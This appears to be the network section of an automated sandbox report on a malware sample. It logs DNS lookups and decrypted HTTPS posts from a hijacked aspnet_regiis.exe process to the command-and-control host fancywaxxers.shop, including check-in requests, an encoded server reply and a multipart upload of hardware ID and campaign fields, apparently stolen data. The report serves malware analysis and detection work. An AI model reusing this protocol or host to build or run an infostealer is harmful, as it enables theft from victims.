                                                                            Dec 29, 2024 23:37:04.390594006 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.390625954 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.390635014 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.390649080 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.390794039 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.390821934 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.390839100 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.390991926 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.391030073 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.400046110 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.400217056 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.400264025 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.400269985 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.400299072 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.400312901 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:04.400419950 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:04.405297041 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.465044975 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.465157986 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.465221882 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.465459108 CET49716443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.465466976 CET44349716104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.475269079 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.475318909 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.475580931 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.476093054 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.476109028 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.910254002 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.910341978 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.911601067 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.911613941 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.911840916 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:06.913155079 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.913247108 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:06.913269997 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362348080 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362412930 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362468004 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362498045 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362503052 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.362560987 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362601995 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.362718105 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362744093 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362792015 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.362807989 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.362858057 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.367031097 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367089987 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367117882 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367155075 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.367171049 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367197037 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.367225885 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.367253065 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.369889021 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.369925976 CET44349717104.21.32.1192.168.2.5
                                                                            Dec 29, 2024 23:37:07.369951010 CET49717443192.168.2.5104.21.32.1
                                                                            Dec 29, 2024 23:37:07.369966030 CET44349717104.21.32.1192.168.2.5

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 29, 2024 23:36:54.981925964 CET6548453192.168.2.51.1.1.1
                                                                            Dec 29, 2024 23:36:54.993448973 CET53654841.1.1.1192.168.2.5

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 29, 2024 23:36:54.981925964 CET192.168.2.51.1.1.10xd6aStandard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 29, 2024 23:36:54.993448973 CET1.1.1.1192.168.2.50xd6aNo error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                            Dec 29, 2024 23:36:54.993448973 CET1.1.1.1192.168.2.50xd6aNo error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                            Dec 29, 2024 23:36:54.993448973 CET1.1.1.1192.168.2.50xd6aNo error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                            Dec 29, 2024 23:36:54.993448973 CET1.1.1.1192.168.2.50xd6aNo error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                            Dec 29, 2024 23:36:54.993448973 CET1.1.1.1192.168.2.50xd6aNo error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                            Dec 29, 2024 23:36:54.993448973 CET1.1.1.1192.168.2.50xd6aNo error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                            Dec 29, 2024 23:36:54.993448973 CET1.1.1.1192.168.2.50xd6aNo error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • fancywaxxers.shop

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.549704104.21.32.14435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-29 22:36:55 UTC264OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:36:55 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2024-12-29 22:36:55 UTC1129INHTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:36:55 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=cfoef94mejek20all48tqrg0go; expires=Thu, 24 Apr 2025 16:23:34 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFpFIP5bHkW3ZYbhcWxOeSkS9wdsDNyJi6zv2Jvzt7PzPhugn8IO3Vb2KmxXQ7%2FUWN8XQLjMTj6iXUSx6YilqCfIYdjQFPVSyr2q8h%2BQb41ITrklneucK87Uqij5v4%2Bdj8pnIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d458f4f2972b9-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1780&rtt_var=682&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1587819&cwnd=214&unsent_bytes=0&cid=a4afd12f97268890&ts=483&x=0"
                                                                            2024-12-29 22:36:55 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2024-12-29 22:36:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.549705104.21.32.14435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-29 22:36:56 UTC265OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 53
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:36:56 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73 73 74 74 26 6a 3d
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@youngesstt&j=
                                                                            2024-12-29 22:36:56 UTC1129INHTTP/1.1 200 OK
                                                                            Date: Sun, 29 Dec 2024 22:36:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=c410gflpvtm3rhp660ue0gk7c7; expires=Thu, 24 Apr 2025 16:23:35 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8E7tkbgjqg6TNIPFyyD7oMuazrRF4QwU6%2FLkmocqhqkao1axujqcmGnt7gj1oir4w3J36Y95waclQpBEphIzksWVbwFaGeKcsiwYrdE%2FYmONiItbmO58lPTfAPPI%2FVmArTM2sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f9d4595be8e72b9-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1794&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=954&delivery_rate=1599123&cwnd=214&unsent_bytes=0&cid=83dc1eadcdec0beb&ts=467&x=0"
                                                                            2024-12-29 22:36:56 UTC240INData Raw: 34 39 39 34 0d 0a 38 35 63 52 4a 68 2f 67 6d 74 53 63 66 57 37 43 30 4a 75 75 53 35 6f 63 64 6b 42 61 74 7a 46 59 35 66 42 46 66 43 42 2b 76 47 57 49 74 57 63 45 4a 64 53 32 39 75 38 59 54 50 69 6b 36 64 73 75 74 6a 34 58 4a 48 69 4e 56 7a 6d 4a 67 79 42 51 41 67 6a 52 52 38 6e 78 63 45 70 73 68 62 62 32 2b 51 56 4d 2b 49 76 67 6a 43 37 30 50 6b 78 69 50 39 31 54 4f 59 6d 53 4a 42 64 50 44 74 41 47 6d 2f 74 32 54 6e 71 44 2f 72 58 77 45 41 75 6e 74 66 72 45 4a 66 4e 78 48 69 31 34 6d 78 4d 39 6e 39 4a 2f 58 6d 30 62 79 41 53 2b 39 6d 4a 4e 50 5a 32 32 72 37 34 59 41 4f 44 71 75 63 38 75 2b 48 41 51 4a 44 48 66 57 54 43 42 6b 79 45 57 55 42 66 61 44 5a 76 31 64 55 39 77 69 75 71 34 2b 68 63 41 6f 62 2f 36 6a 47
                                                                            Data Ascii: 499485cRJh/gmtScfW7C0JuuS5ocdkBatzFY5fBFfCB+vGWItWcEJdS29u8YTPik6dsutj4XJHiNVzmJgyBQAgjRR8nxcEpshbb2+QVM+IvgjC70PkxiP91TOYmSJBdPDtAGm/t2TnqD/rXwEAuntfrEJfNxHi14mxM9n9J/Xm0byAS+9mJNPZ22r74YAODquc8u+HAQJDHfWTCBkyEWUBfaDZv1dU9wiuq4+hcAob/6jG
                                                                            2024-12-29 22:36:56 UTC1369INData Raw: 65 34 65 51 78 69 59 4a 55 41 43 49 53 44 4e 67 74 50 44 4e 68 48 6a 72 74 71 42 48 71 4f 75 4f 36 2b 46 77 43 75 74 2f 72 44 4c 76 6c 2b 42 69 30 34 31 6c 73 79 67 35 67 6f 45 55 30 53 31 41 43 5a 2f 48 52 4c 65 6f 72 2b 75 66 31 66 51 75 43 31 34 59 78 78 75 46 34 45 49 54 76 42 58 69 76 48 6a 57 6b 48 41 68 76 53 52 38 6d 31 64 55 70 38 6a 2f 69 6b 39 68 51 48 70 61 44 79 78 53 54 31 66 68 6b 6f 4e 39 5a 54 50 59 32 59 4b 42 52 47 45 64 4d 42 6b 66 55 7a 43 6a 32 46 34 50 61 6d 58 79 2b 6c 6f 76 37 41 50 37 70 45 56 44 31 32 7a 42 4d 39 69 39 4a 2f 58 6b 6f 5a 33 51 53 61 2b 6e 42 4d 64 70 44 34 70 50 67 53 43 62 4b 30 2f 4d 49 6a 2b 32 77 65 4c 44 37 57 57 6a 47 4f 6c 79 41 61 41 6c 4b 65 41 49 6d 31 4b 77 52 63 6a 2f 4f 36 39 41 67 4d 34 4b 32 33 31
                                                                            Data Ascii: e4eQxiYJUACISDNgtPDNhHjrtqBHqOuO6+FwCut/rDLvl+Bi041lsyg5goEU0S1ACZ/HRLeor+uf1fQuC14YxxuF4EITvBXivHjWkHAhvSR8m1dUp8j/ik9hQHpaDyxST1fhkoN9ZTPY2YKBRGEdMBkfUzCj2F4PamXy+lov7AP7pEVD12zBM9i9J/XkoZ3QSa+nBMdpD4pPgSCbK0/MIj+2weLD7WWjGOlyAaAlKeAIm1KwRcj/O69AgM4K231
                                                                            2024-12-29 22:36:56 UTC1369INData Raw: 59 4b 44 37 61 58 6a 62 48 33 47 63 5a 57 6c 79 47 52 37 76 32 5a 30 64 33 77 4d 32 31 38 42 45 4c 74 76 4c 6d 67 6a 43 34 65 52 68 69 59 4a 56 65 4f 34 2b 55 4e 52 46 50 48 39 41 4a 6e 76 42 38 54 48 32 43 39 62 50 36 46 41 65 6a 76 2f 33 65 49 2f 68 32 45 53 4d 79 33 78 4e 30 78 35 55 2f 58 68 70 63 37 78 43 61 74 30 5a 48 63 34 7a 2f 6f 4c 34 41 51 72 6e 79 2f 73 42 70 6f 44 34 5a 4b 6a 33 51 58 44 75 4e 6e 43 49 55 54 68 54 51 42 49 50 36 64 30 52 78 69 76 4b 37 38 42 73 45 71 62 6e 79 79 69 6e 35 64 46 52 73 65 4e 4a 4c 65 74 2f 53 45 78 6c 4f 45 64 46 46 70 50 5a 39 53 6e 71 55 75 4b 6d 77 42 6b 79 6e 76 72 6d 55 61 66 52 33 46 43 6b 79 30 56 4d 39 69 70 63 6b 47 55 45 52 32 51 32 66 38 6e 64 49 64 49 2f 2b 74 76 6b 62 43 62 4b 33 38 4d 41 6c 75 44
                                                                            Data Ascii: YKD7aXjbH3GcZWlyGR7v2Z0d3wM218BELtvLmgjC4eRhiYJVeO4+UNRFPH9AJnvB8TH2C9bP6FAejv/3eI/h2ESMy3xN0x5U/Xhpc7xCat0ZHc4z/oL4AQrny/sBpoD4ZKj3QXDuNnCIUThTQBIP6d0RxivK78BsEqbnyyin5dFRseNJLet/SExlOEdFFpPZ9SnqUuKmwBkynvrmUafR3FCky0VM9ipckGUER2Q2f8ndIdI/+tvkbCbK38MAluD
                                                                            2024-12-29 22:36:56 UTC1369INData Raw: 79 68 30 6a 78 35 55 72 58 68 70 63 31 77 36 44 2b 33 31 4e 63 49 54 77 73 66 41 53 42 36 61 35 2f 73 73 76 39 58 59 5a 4a 7a 76 55 56 7a 43 56 6b 53 77 55 54 78 61 65 53 64 48 79 61 77 51 6c 77 74 2b 36 31 77 38 58 73 71 53 35 30 32 66 68 50 68 4d 75 65 49 30 54 4f 59 69 62 4b 42 5a 4b 45 39 45 44 6e 2f 4e 31 53 58 69 4e 38 71 54 32 45 51 47 72 76 66 4c 65 4b 66 56 36 47 43 59 77 33 6c 6c 36 79 64 49 67 42 67 4a 45 6e 6a 4b 63 2b 6e 4e 48 61 38 4c 6e 2b 4f 64 66 43 36 7a 79 6f 59 77 6c 39 6e 34 62 4c 6a 54 65 57 7a 75 4c 6e 43 41 62 53 78 54 57 46 5a 44 78 65 30 56 7a 6a 66 6d 79 2b 78 6f 49 70 37 62 2f 77 32 6d 32 50 68 4d 36 65 49 30 54 46 61 43 6e 5a 54 39 34 58 4d 46 4a 69 4c 56 30 53 44 33 61 75 4c 72 39 45 77 53 76 74 50 44 41 49 2f 46 31 47 43 6b
                                                                            Data Ascii: yh0jx5UrXhpc1w6D+31NcITwsfASB6a5/ssv9XYZJzvUVzCVkSwUTxaeSdHyawQlwt+61w8XsqS502fhPhMueI0TOYibKBZKE9EDn/N1SXiN8qT2EQGrvfLeKfV6GCYw3ll6ydIgBgJEnjKc+nNHa8Ln+OdfC6zyoYwl9n4bLjTeWzuLnCAbSxTWFZDxe0Vzjfmy+xoIp7b/w2m2PhM6eI0TFaCnZT94XMFJiLV0SD3auLr9EwSvtPDAI/F1GCk
                                                                            2024-12-29 22:36:56 UTC1369INData Raw: 6f 4b 64 4a 68 39 45 44 74 6b 4f 67 2f 74 2b 53 33 57 4b 38 62 66 36 47 67 47 6d 76 76 50 4e 4c 76 5a 77 48 47 4a 32 6c 56 51 69 78 38 70 6e 50 31 49 48 7a 42 47 63 31 48 35 4c 50 5a 32 32 72 37 34 59 41 4f 44 71 75 63 55 37 2f 48 4d 47 4b 7a 2f 62 58 44 6d 56 6b 79 6f 56 55 42 76 52 41 35 62 35 64 55 74 37 67 2f 32 38 38 68 67 4a 71 37 33 31 6a 47 65 34 65 51 78 69 59 4a 56 39 4d 5a 53 46 4a 42 42 4a 43 73 56 48 6a 72 74 71 42 48 71 4f 75 4f 36 2b 48 41 65 72 74 76 6e 41 4b 66 78 7a 46 44 41 33 30 6c 51 7a 6a 49 41 74 47 55 55 58 31 67 79 65 38 32 46 49 63 35 44 39 70 4f 78 66 51 75 43 31 34 59 78 78 75 45 67 54 4d 69 6a 57 45 51 75 52 6b 54 45 56 54 78 43 65 47 4e 2f 73 4d 30 4e 78 77 71 44 32 2b 42 41 46 6f 37 33 34 78 53 58 31 65 78 30 6e 4f 64 4e 58
                                                                            Data Ascii: oKdJh9EDtkOg/t+S3WK8bf6GgGmvvPNLvZwHGJ2lVQix8pnP1IHzBGc1H5LPZ22r74YAODqucU7/HMGKz/bXDmVkyoVUBvRA5b5dUt7g/288hgJq731jGe4eQxiYJV9MZSFJBBJCsVHjrtqBHqOuO6+HAertvnAKfxzFDA30lQzjIAtGUUX1gye82FIc5D9pOxfQuC14YxxuEgTMijWEQuRkTEVTxCeGN/sM0NxwqD2+BAFo734xSX1ex0nOdNX
                                                                            2024-12-29 22:36:56 UTC1369INData Raw: 51 46 41 67 4f 51 48 74 48 79 66 77 51 6c 77 76 75 78 2f 52 34 47 71 62 37 32 79 79 33 71 64 42 4d 77 4f 64 52 59 4e 34 75 53 4b 68 4e 49 48 64 63 4b 6e 66 68 30 51 33 4b 48 75 50 69 2b 47 42 54 67 36 72 6e 74 4a 50 4e 79 54 33 68 34 79 68 30 6a 78 35 55 72 58 68 70 63 33 67 32 55 2f 33 35 48 63 6f 48 71 74 2f 67 4e 44 4b 32 34 36 38 59 69 2f 58 4d 5a 4c 7a 76 54 56 54 47 4c 67 43 34 65 51 52 65 65 53 64 48 79 61 77 51 6c 77 74 75 68 36 42 55 4c 72 4b 54 79 7a 53 72 75 63 77 52 69 64 70 56 43 50 5a 62 53 66 77 68 53 43 39 6b 59 33 2b 77 7a 51 33 48 43 6f 50 62 34 46 67 71 6e 74 50 66 65 4c 50 35 78 47 79 73 78 30 56 73 35 68 35 59 6a 47 55 63 66 30 67 79 57 39 6e 78 41 64 49 7a 78 75 62 35 52 54 4b 65 71 75 5a 52 70 32 57 55 58 4c 6a 57 56 54 48 53 65 30
                                                                            Data Ascii: QFAgOQHtHyfwQlwvux/R4Gqb72yy3qdBMwOdRYN4uSKhNIHdcKnfh0Q3KHuPi+GBTg6rntJPNyT3h4yh0jx5UrXhpc3g2U/35HcoHqt/gNDK2468Yi/XMZLzvTVTGLgC4eQReeSdHyawQlwtuh6BULrKTyzSrucwRidpVCPZbSfwhSC9kY3+wzQ3HCoPb4FgqntPfeLP5xGysx0Vs5h5YjGUcf0gyW9nxAdIzxub5RTKequZRp2WUXLjWVTHSe0
                                                                            2024-12-29 22:36:56 UTC1369INData Raw: 62 78 6b 66 4a 74 56 4e 50 61 34 66 2f 6f 4c 77 71 44 36 36 38 2f 74 70 70 35 30 46 61 59 6a 66 50 45 32 4b 2b 69 32 63 5a 54 6c 79 47 52 34 54 79 63 30 4e 6e 6c 50 2b 36 37 78 51 42 72 4a 44 32 79 7a 2f 37 63 52 63 7a 4d 5a 6c 59 4e 38 66 63 5a 78 6c 61 58 49 5a 48 76 76 4a 6c 52 31 4b 42 36 62 2b 2b 55 55 79 6e 70 4c 6d 55 61 63 59 2b 42 69 45 6f 31 6c 77 72 75 64 4a 2f 42 33 78 63 31 52 47 57 35 58 42 53 64 6f 2f 30 70 38 42 66 56 50 54 67 71 35 35 37 71 6d 46 55 50 51 65 62 45 7a 76 48 79 68 34 48 41 67 71 65 58 38 4f 37 4d 31 59 39 32 72 6a 78 2f 51 30 65 70 72 48 76 7a 32 37 47 51 44 4d 30 4d 74 4a 44 50 5a 43 64 5a 31 41 43 45 35 35 66 71 4c 56 36 51 32 61 54 37 72 76 75 47 45 79 66 2f 4c 6e 55 61 61 41 2b 49 53 45 32 32 31 51 73 6c 74 38 41 43 45
                                                                            Data Ascii: bxkfJtVNPa4f/oLwqD668/tpp50FaYjfPE2K+i2cZTlyGR4Tyc0NnlP+67xQBrJD2yz/7cRczMZlYN8fcZxlaXIZHvvJlR1KB6b++UUynpLmUacY+BiEo1lwrudJ/B3xc1RGW5XBSdo/0p8BfVPTgq557qmFUPQebEzvHyh4HAgqeX8O7M1Y92rjx/Q0eprHvz27GQDM0MtJDPZCdZ1ACE55fqLV6Q2aT7rvuGEyf/LnUaaA+ISE221Qslt8ACE
                                                                            2024-12-29 22:36:56 UTC1369INData Raw: 6e 50 6b 7a 43 6a 32 58 38 37 72 34 45 68 6e 76 6f 2b 2f 50 50 2f 38 79 48 44 4d 31 32 52 4d 46 79 64 49 2f 58 68 70 63 36 77 53 66 2b 33 52 53 62 4d 2f 59 76 66 49 63 41 4b 47 31 75 59 4a 70 2f 6a 35 4d 63 58 61 56 56 79 76 48 79 6e 64 4d 47 55 6d 4e 55 4d 47 6e 62 41 70 6b 77 75 37 32 70 6b 31 43 34 4b 43 35 6c 47 6d 2f 66 51 59 77 50 74 5a 46 4f 63 43 73 47 52 39 50 45 35 49 4a 6d 76 56 30 56 47 75 5a 74 4c 37 39 42 52 61 65 6a 4e 4c 41 4c 2f 39 6b 45 79 51 65 39 52 4e 30 78 35 31 6e 52 6e 74 63 6c 6b 65 75 75 7a 4e 63 50 64 71 34 67 2f 30 52 41 71 65 6b 36 49 45 42 32 30 51 75 59 42 54 53 52 6e 69 7a 6c 54 63 50 53 52 48 53 52 39 2b 31 64 51 51 6c 30 72 62 32 2b 67 35 4d 2b 4f 4b 72 6c 33 79 72 4b 55 52 77 4a 35 74 4b 65 70 48 53 66 30 77 4d 58 4d 78
                                                                            Data Ascii: nPkzCj2X87r4Ehnvo+/PP/8yHDM12RMFydI/Xhpc6wSf+3RSbM/YvfIcAKG1uYJp/j5McXaVVyvHyndMGUmNUMGnbApkwu72pk1C4KC5lGm/fQYwPtZFOcCsGR9PE5IJmvV0VGuZtL79BRaejNLAL/9kEyQe9RN0x51nRntclkeuuzNcPdq4g/0RAqek6IEB20QuYBTSRnizlTcPSRHSR9+1dQQl0rb2+g5M+OKrl3yrKURwJ5tKepHSf0wMXMx
                                                                            2024-12-29 22:36:56 UTC1369INData Raw: 51 51 6c 30 62 62 32 37 46 39 55 34 50 58 33 77 53 6a 37 63 42 63 77 4b 74 4e 51 4c 49 54 56 47 53 42 6e 45 64 4d 43 6e 2f 4a 4e 65 6c 79 49 36 4c 76 78 47 45 36 41 74 65 2f 50 46 38 5a 4a 42 53 55 6f 6c 33 55 35 6b 5a 46 6e 55 41 49 45 6e 6c 2f 52 31 48 6c 55 63 49 33 2f 39 4e 34 59 47 71 50 79 74 34 77 74 75 43 5a 55 42 7a 58 59 56 6a 53 41 30 41 59 55 55 68 48 52 41 4e 50 56 64 46 4a 2b 77 72 62 32 38 6c 39 55 34 4c 50 7a 33 43 54 33 65 56 67 6c 49 74 49 54 64 4d 65 63 5a 30 59 43 48 64 51 58 6e 50 70 30 43 48 75 4d 39 76 62 68 55 52 58 67 70 4c 6d 55 65 72 59 2b 42 6d 4a 67 6c 52 51 35 6c 59 41 68 48 56 51 66 6d 54 6d 76 32 47 46 44 62 59 47 36 68 2f 4d 62 47 72 57 78 36 63 73 58 78 6c 4d 47 4a 53 6a 57 45 51 75 52 6b 53 63 51 52 56 79 51 52 34 6d 31
                                                                            Data Ascii: QQl0bb27F9U4PX3wSj7cBcwKtNQLITVGSBnEdMCn/JNelyI6LvxGE6Ate/PF8ZJBSUol3U5kZFnUAIEnl/R1HlUcI3/9N4YGqPyt4wtuCZUBzXYVjSA0AYUUhHRANPVdFJ+wrb28l9U4LPz3CT3eVglItITdMecZ0YCHdQXnPp0CHuM9vbhURXgpLmUerY+BmJglRQ5lYAhHVQfmTmv2GFDbYG6h/MbGrWx6csXxlMGJSjWEQuRkScQRVyQR4m1


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.549707104.21.32.14435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-29 22:36:57 UTC280OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=AMTB3QLKBFJ98IV
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 12823
                                                                            Host: fancywaxxers.shop
                                                                            2024-12-29 22:36:57 UTC12823OUTData Raw: 2d 2d 41 4d 54 42 33 51 4c 4b 42 46 4a 39 38 49 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 42 43 33 37 45 32 45 39 37 46 35 32 46 35 43 31 42 38 32 35 45 35 30 36 46 30 32 31 37 32 37 0d 0a 2d 2d 41 4d 54 42 33 51 4c 4b 42 46 4a 39 38 49 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 4d 54 42 33 51 4c 4b 42 46 4a 39 38 49 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 79 6f 75 6e 67 65 73 73 74 74 0d 0a 2d
